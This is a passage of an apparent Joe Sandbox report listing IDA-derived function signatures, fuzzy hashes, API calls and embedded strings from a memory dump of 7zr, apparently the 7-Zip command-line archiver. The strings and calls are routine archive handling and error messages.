                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: Version
                          • String ID:
                          • API String ID: 1889659487-0
                          • Opcode ID: 52f42061bc80ccfde8fac8bdb87478d8120a21c8eee0f339e035aba2a161cf32
                          • Instruction ID: 861a243d0a7e2e15bac9a549b394f2c5a1c285523c7131a173445950170dfc82
                          • Opcode Fuzzy Hash: 52f42061bc80ccfde8fac8bdb87478d8120a21c8eee0f339e035aba2a161cf32
                          • Instruction Fuzzy Hash: 1CD0127293181557E700B6ACD84A3597765F760300FC80994D865C1157F979CB6A8692
                          APIs
                          • GetSystemTimeAsFileTime.KERNEL32(?,001BB9BE,00000000,00000000,759A8E30), ref: 0018AB2B
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: Time$FileSystem
                          • String ID:
                          • API String ID: 2086374402-0
                          • Opcode ID: 8d1bd7db07141e4e98c8efee3b8c4c06a7066f29e72d9be017ec51505ebf13f2
                          • Instruction ID: 7318ce8b2dd4118e4c3897c6d404916d4dec20393da91184333c57aa9a3e9905
                          • Opcode Fuzzy Hash: 8d1bd7db07141e4e98c8efee3b8c4c06a7066f29e72d9be017ec51505ebf13f2
                          • Instruction Fuzzy Hash:
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID: ERROR$GNU$LongLink$LongName$PAX$PAX_error$PAX_overflow$PAX_unsupported_line$POSIX$SignedChecksum$WARNING$atime$bin_mtime$bin_psize$bin_size$ctime$mtime$pax_linkpath$pax_path$pax_size
                          • API String ID: 3519838083-1011227609
                          • Opcode ID: c991208a3cba9c26d32d3a52809e36a7c0be99712d087775cecf30cd14ec9f00
                          • Instruction ID: 04512f5ac23dbe9319649b8dafde960f56a6f543c2c6fbb716ed6286bee6ecfd
                          • Opcode Fuzzy Hash: c991208a3cba9c26d32d3a52809e36a7c0be99712d087775cecf30cd14ec9f00
                          • Instruction Fuzzy Hash: 4BD1067181474BDACF29EBA0D9919FEBBB1AF21300F144D1FE19663391D7306A4ADB81
                          APIs
                          • __EH_prolog.LIBCMT ref: 001E07B8
                            • Part of subcall function 00181E40: free.MSVCRT ref: 00181E44
                            • Part of subcall function 0018297F: memcpy.MSVCRT(?,?,?,?,?,001A50A5,?,?), ref: 001829B2
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prologfreememcpy
                          • String ID: @PathCut/_pc_$L$PaxHeader/@PaxHeader$atime$crc32/$ctime$devmajor$devminor$gid$gname$linkpath$mtime$path$root$size$uid$uname
                          • API String ID: 2037215848-4204487407
                          • Opcode ID: 1a679aa5a676006030170fdfc2a6a5d5306bca537452b25eedf91a99a70f2622
                          • Instruction ID: 1e33451a860ade2344e10f855c7d2e81e1bd82831f5e0cdfd822cee91960d623
                          • Opcode Fuzzy Hash: 1a679aa5a676006030170fdfc2a6a5d5306bca537452b25eedf91a99a70f2622
                          • Instruction Fuzzy Hash: A302BF70900A89DFDB26DF55C890AADFBB5BF29304F5441AED049A3242D770AEC9CB61
                          APIs
                          • memcmp.MSVCRT(?,002348A0,00000010), ref: 0018C09E
                          • memcmp.MSVCRT(?,00230258,00000010), ref: 0018C0BB
                          • memcmp.MSVCRT(?,00230348,00000010), ref: 0018C0CE
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: memcmp
                          • String ID:
                          • API String ID: 1475443563-0
                          • Opcode ID: e95d0d0871ded2c52168c0eca4d5584046ceb2faf5dfabb5ce50ff37ce01f160
                          • Instruction ID: ceb417b80132871cc72e7395621b8073df7341f6000d05647db9c4966179c8de
                          • Opcode Fuzzy Hash: e95d0d0871ded2c52168c0eca4d5584046ceb2faf5dfabb5ce50ff37ce01f160
                          • Instruction Fuzzy Hash: C2917B72650614ABD764AA25DC85FAB73A8EF66750F008029FD4AE7241F730AE54CFF0
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID: $16-bit overflow for number of files in headers$32-bit overflow in headers$Central$Local$Minor_Extra_ERROR$Missing volume : $Unsorted_CD$Zip64$apk
                          • API String ID: 3519838083-1909666238
                          • Opcode ID: 400702ee5639ed0a2cf69c7faeb5b284bbd74fe9127b009f0517fa5082ab6a7f
                          • Instruction ID: e572251b969658b0cde41ad7b1641512f0f8abe066f285be80c204fac41f61a8
                          • Opcode Fuzzy Hash: 400702ee5639ed0a2cf69c7faeb5b284bbd74fe9127b009f0517fa5082ab6a7f
                          • Instruction Fuzzy Hash: 9EC1B231D14AC59FCB19EFA6C855EFD7BB1EF12300F5A80A9E0496B262D730AE45DB40
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID: -Cert$:eos$AES$Central$Descriptor_ERROR$Local$StrongCrypto$ZipCrypto$p,#
                          • API String ID: 3519838083-3087170221
                          • Opcode ID: e2febadceaabdefb4ba1163ef61d9e6fda84f3156c42e3af46904f3b9eeb44c3
                          • Instruction ID: 46c8aa8179172b11e9bcfab13dfc80a08967c04891c5f2af085166d6da00fe86
                          • Opcode Fuzzy Hash: e2febadceaabdefb4ba1163ef61d9e6fda84f3156c42e3af46904f3b9eeb44c3
                          • Instruction Fuzzy Hash: 19F1FA31900A889BCF2AEFA5C951AFEBBB5BF25714F180419F44273192DB349F46DB60
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID: $ $$ #$.$:mem$Delta$LZMA$LZMA2$o
                          • API String ID: 3519838083-1172921480
                          • Opcode ID: 24d39f0a3d5949b05854dd84ccb1cde5fd5dfcf3ceb2957bba69c3a27d4d3abd
                          • Instruction ID: c732d73bde0ef5ed163f62bd44fea8d33421abd580b5b2804fd51623a16db6be
                          • Opcode Fuzzy Hash: 24d39f0a3d5949b05854dd84ccb1cde5fd5dfcf3ceb2957bba69c3a27d4d3abd
                          • Instruction Fuzzy Hash: 2DD1DE31D0026D8ACF25CFA8C895BEEBBB2BF69304F24416DD859AB241D771DE05CB91
                          APIs
                          • __EH_prolog.LIBCMT ref: 001864F8
                          • GetCurrentThreadId.KERNEL32 ref: 00186508
                          • GetTickCount.KERNEL32 ref: 00186513
                          • GetCurrentProcessId.KERNEL32(?,?,00000000), ref: 0018651E
                          • GetTickCount.KERNEL32 ref: 00186578
                          • SetLastError.KERNEL32(000000B7,?,?,?,?,00000000), ref: 001865C5
                          • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 001865EC
                            • Part of subcall function 00185D7A: __EH_prolog.LIBCMT ref: 00185D7F
                            • Part of subcall function 00185D7A: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00000001,?,?,00000000), ref: 00185DA1
                            • Part of subcall function 00181E40: free.MSVCRT ref: 00181E44
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: CountCurrentErrorH_prologLastTick$CreateDirectoryProcessThreadfree
                          • String ID: .tmp$d
                          • API String ID: 1989517917-2797371523
                          • Opcode ID: b6c5100e9186a2e0ffd2b7be0348de255bacc1e1acc86e3f5c0a432654f1afc0
                          • Instruction ID: 95caeb4e25ce6efb72efaced836a2fc7700b001c89ee07e809d5d0ed6fd67c13
                          • Opcode Fuzzy Hash: b6c5100e9186a2e0ffd2b7be0348de255bacc1e1acc86e3f5c0a432654f1afc0
                          • Instruction Fuzzy Hash: C041F332910124ABDF19BFA0E85A7ED77B1FF25354F244129E806AB2A1CB348B51CF51
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: fputs
                          • String ID: : Cannot open the file as [$ERROR$Open $WARNING$] archive
                          • API String ID: 1795875747-657955069
                          • Opcode ID: 313120d64254d7fb3a294df8aecc13b1f69f1dd83f4fafa9b4cf789e943f9b6a
                          • Instruction ID: 9429de16f620428f461803867c70c2e6473afd6c6e0f8298a8a6375a7cf40542
                          • Opcode Fuzzy Hash: 313120d64254d7fb3a294df8aecc13b1f69f1dd83f4fafa9b4cf789e943f9b6a
                          • Instruction Fuzzy Hash: 7EF0A732A041287BCA2027D57E85D6EFF6DDF96761B240037FA0443291EF611C719FA1
                          APIs
                          • __EH_prolog.LIBCMT ref: 001CE774
                            • Part of subcall function 00183563: memmove.MSVCRT(?,?,00000022,00000000,?,00181DAE,00000000,00000000,00000000,00181D37,7FFFFFE0,00000000,00000000,?,00000000,00000000), ref: 00183588
                            • Part of subcall function 001CE6C2: __EH_prolog.LIBCMT ref: 001CE6C7
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog$memmove
                          • String ID: H #$P #$T #$\ #$hcf$mtf$rsfx
                          • API String ID: 593149739-3503103369
                          • Opcode ID: ac1dcf83aac06fdc0313a8f85a66ea86043e3b0ad5a03dcbf179569aca52e7c3
                          • Instruction ID: 9a0032299844f6325150bc018bdb215647b0860babc9c59446286e0564d31b13
                          • Opcode Fuzzy Hash: ac1dcf83aac06fdc0313a8f85a66ea86043e3b0ad5a03dcbf179569aca52e7c3
                          • Instruction Fuzzy Hash: 1D519131904245DBCF25EBA0C491FBEB3B2AB74318F14852DEC625B292DB74DE09DB51
                          APIs
                          • __EH_prolog.LIBCMT ref: 00196B63
                            • Part of subcall function 00194D92: __EH_prolog.LIBCMT ref: 00194D97
                            • Part of subcall function 00187DF8: __EH_prolog.LIBCMT ref: 00187DFD
                          Strings
                          • Dangerous link path was ignored, xrefs: 00196BE5
                          • Internal error for symbolic link file, xrefs: 00196D53
                          • Incorrect path, xrefs: 00196C46
                          • Cannot fill link data, xrefs: 00196D1E
                          • Empty link, xrefs: 00196C21
                          • Dangerous symbolic link path was ignored, xrefs: 00196CCB
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID: Cannot fill link data$Dangerous link path was ignored$Dangerous symbolic link path was ignored$Empty link$Incorrect path$Internal error for symbolic link file
                          • API String ID: 3519838083-3151419218
                          • Opcode ID: d7cec4b2547b18f06b08f370f610f6eb32bdde38867b74aa74b452755b651bea
                          • Instruction ID: 009ae73248ce600ed6a8405815240d655f123c0715c417bb2f972a381903ee87
                          • Opcode Fuzzy Hash: d7cec4b2547b18f06b08f370f610f6eb32bdde38867b74aa74b452755b651bea
                          • Instruction Fuzzy Hash: 6371B175A00249AFCF16EBE0D8519EEBBB5EF29304F108029F89563252DB315A19DB71
                          APIs
                            • Part of subcall function 00217D80: WaitForSingleObject.KERNEL32(?,000000FF,0019AFD6,?), ref: 00217D83
                            • Part of subcall function 00217D80: GetLastError.KERNEL32(?,000000FF,0019AFD6,?), ref: 00217D8E
                            • Part of subcall function 00212FB0: EnterCriticalSection.KERNEL32(?,?,?,00212749), ref: 00212FB8
                            • Part of subcall function 00212FB0: LeaveCriticalSection.KERNEL32(?,?,?,00212749), ref: 00212FC2
                          • EnterCriticalSection.KERNEL32(?), ref: 0021290E
                          • LeaveCriticalSection.KERNEL32(?), ref: 00212928
                          • EnterCriticalSection.KERNEL32(?), ref: 00212992
                          • LeaveCriticalSection.KERNEL32(?), ref: 002129B8
                          • EnterCriticalSection.KERNEL32(?), ref: 00212A1E
                          • LeaveCriticalSection.KERNEL32(?), ref: 00212A56
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: CriticalSection$EnterLeave$ErrorLastObjectSingleWait
                          • String ID: v
                          • API String ID: 2116739831-3261393531
                          • Opcode ID: d1720dd28bfe0461dc0fe5b0f0c4a82d3249f5383e919330dbe15c1fe2a8bdf6
                          • Instruction ID: f563a73ba7cc7f22f862615bf98113d7e92807a2eb59de73b2e280addf311f75
                          • Opcode Fuzzy Hash: d1720dd28bfe0461dc0fe5b0f0c4a82d3249f5383e919330dbe15c1fe2a8bdf6
                          • Instruction Fuzzy Hash: A0C16D75514706CFC320DF28C580BA7B7E2FFA8314F15492DE9AA87251EB30E9A9CB51
                          APIs
                          • __EH_prolog.LIBCMT ref: 001A4B61
                            • Part of subcall function 00181E40: free.MSVCRT ref: 00181E44
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prologfree
                          • String ID: -----$-----BEGIN PGP SIGNED MESSAGE$Hash: $cksum
                          • API String ID: 1978129608-4104380264
                          • Opcode ID: ac0ab5d0729809a0158b595a72b70d5017d89ef56c60330a417ea1dda5c9cd59
                          • Instruction ID: 2fa0b311f1ddcb006a50d04ac4300719683d6712b341888abf107b9bb739aa1c
                          • Opcode Fuzzy Hash: ac0ab5d0729809a0158b595a72b70d5017d89ef56c60330a417ea1dda5c9cd59
                          • Instruction Fuzzy Hash: BCB1D335804248EFCF22EFA4C581BEDBBB1BF66304F24449DE54567182CBB69E49CB61
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prologfputs
                          • String ID: Cannot open the file$The archive is open with offset$The file is open$WARNING:
                          • API String ID: 1798449854-1259944392
                          • Opcode ID: 6d430c1d1fed7685c6c0fb7e9a32ddbcb182d0643847ae28024dbeef1f711962
                          • Instruction ID: 685373b7daa8407940a1c832a7070a485becfec703bb035683897350634ab3f7
                          • Opcode Fuzzy Hash: 6d430c1d1fed7685c6c0fb7e9a32ddbcb182d0643847ae28024dbeef1f711962
                          • Instruction Fuzzy Hash: 01219532A00514AFCB15EB94D5429FEB3B9FF78310F000079E516D76A1DB74AE568F80
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: exit$CriticalSection$EnterLeave
                          • String ID: v
                          • API String ID: 43521-3261393531
                          • Opcode ID: e3793f3dd941bcb2f47c07379a8e93897b29bdefbcf5e9d92de3ff6e05ba647c
                          • Instruction ID: b2a6f95ed46fb044b371a966a4b74039547986abe778a54d66bf4100fa7d8df1
                          • Opcode Fuzzy Hash: e3793f3dd941bcb2f47c07379a8e93897b29bdefbcf5e9d92de3ff6e05ba647c
                          • Instruction Fuzzy Hash: 2D110971510B019FC770EFA1C981596F7F1BF54704B404A2EE1C742A82DBB4B59ACF91
                          APIs
                          • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 001869C8
                          • GetProcAddress.KERNEL32(00000000,FindFirstStreamW), ref: 001869DC
                          • GetProcAddress.KERNEL32(00000000,FindNextStreamW), ref: 001869E9
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: AddressProc$HandleModule
                          • String ID: FindFirstStreamW$FindNextStreamW$kernel32.dll
                          • API String ID: 667068680-4044117955
                          • Opcode ID: 13e50073a0a836aa7594b019f3c4505c0f865f309b1b2d3b6fe91c19616a5736
                          • Instruction ID: 94f65505ca70a5fe9f0e4a8fd7700a7af2c557a5ad3e147e19eb2d0697b7fee2
                          • Opcode Fuzzy Hash: 13e50073a0a836aa7594b019f3c4505c0f865f309b1b2d3b6fe91c19616a5736
                          • Instruction Fuzzy Hash: AAE08671A11124BF531457EA7C4E92AAAACDA86BA03B2002BF404E3360D6F068355EA1
                          APIs
                          • memcmp.MSVCRT(?,002348A0,00000010), ref: 001C28EA
                          • memcmp.MSVCRT(?,00230258,00000010), ref: 001C2907
                          • memcmp.MSVCRT(?,002302D8,00000010), ref: 001C291A
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: memcmp
                          • String ID:
                          • API String ID: 1475443563-0
                          • Opcode ID: 17fcdeb9e57dd0df3f82f5035c088ce5d1d661ce4025699aab93d18a1535307c
                          • Instruction ID: 2c2203035638a252944b1aa6ea1ddf4a2e7b9c7e9d2af371c859466712a5de2e
                          • Opcode Fuzzy Hash: 17fcdeb9e57dd0df3f82f5035c088ce5d1d661ce4025699aab93d18a1535307c
                          • Instruction Fuzzy Hash: BC31A0B2750218ABE7088A10CD82FBF73E89B71798F018129FD459B241F775DD5097E1
                          APIs
                          • __EH_prolog.LIBCMT ref: 00186A7D
                            • Part of subcall function 00186848: FindClose.KERNELBASE(00000000,?,00186880), ref: 00186853
                          • SetLastError.KERNEL32(00000078,00000000,?,?), ref: 00186AA6
                          • SetLastError.KERNEL32(00000000,00000000,?,?), ref: 00186AB2
                          • FindFirstStreamW.KERNELBASE(?,00000000,-00000270,00000000), ref: 00186AD3
                          • GetLastError.KERNEL32(?,?), ref: 00186AE0
                          • FindFirstStreamW.KERNELBASE(?,00000000,-00000270,00000000), ref: 00186B1C
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: ErrorFindLast$FirstStream$CloseH_prolog
                          • String ID:
                          • API String ID: 1050961465-0
                          • Opcode ID: 4a20e18795ee7961136e935959afdd342d95d441f575f52d4111d56de88d3621
                          • Instruction ID: 6cb0d295ccd3698e66809e13d498f22493c73cb65d08c7cfb1b1d5818ac148a0
                          • Opcode Fuzzy Hash: 4a20e18795ee7961136e935959afdd342d95d441f575f52d4111d56de88d3621
                          • Instruction Fuzzy Hash: 6D21C570600105EBCB25BF60D9898AEBBB9FF91368F104219F85593190DB314F8ADF10
                          APIs
                          • fputs.MSVCRT ref: 001BCCC2
                            • Part of subcall function 001BC7D7: fputs.MSVCRT ref: 001BC840
                          • fputs.MSVCRT ref: 001BCE43
                            • Part of subcall function 00181F91: fflush.MSVCRT ref: 00181F93
                          • fputs.MSVCRT ref: 001BCD75
                            • Part of subcall function 00181FA0: fputc.MSVCRT ref: 00181FA7
                            • Part of subcall function 00181FB3: __EH_prolog.LIBCMT ref: 00181FB8
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: fputs$H_prologfflushfputc
                          • String ID: ERRORS:$WARNINGS:
                          • API String ID: 1876658717-3472301450
                          • Opcode ID: 49515606a065e3864724f30751b46d35a52e0e228161519a5763f12938494ea7
                          • Instruction ID: 2d6dac0ca50a8783d50d1c4079fe50e00f822954c396fc41e047592e1912913e
                          • Opcode Fuzzy Hash: 49515606a065e3864724f30751b46d35a52e0e228161519a5763f12938494ea7
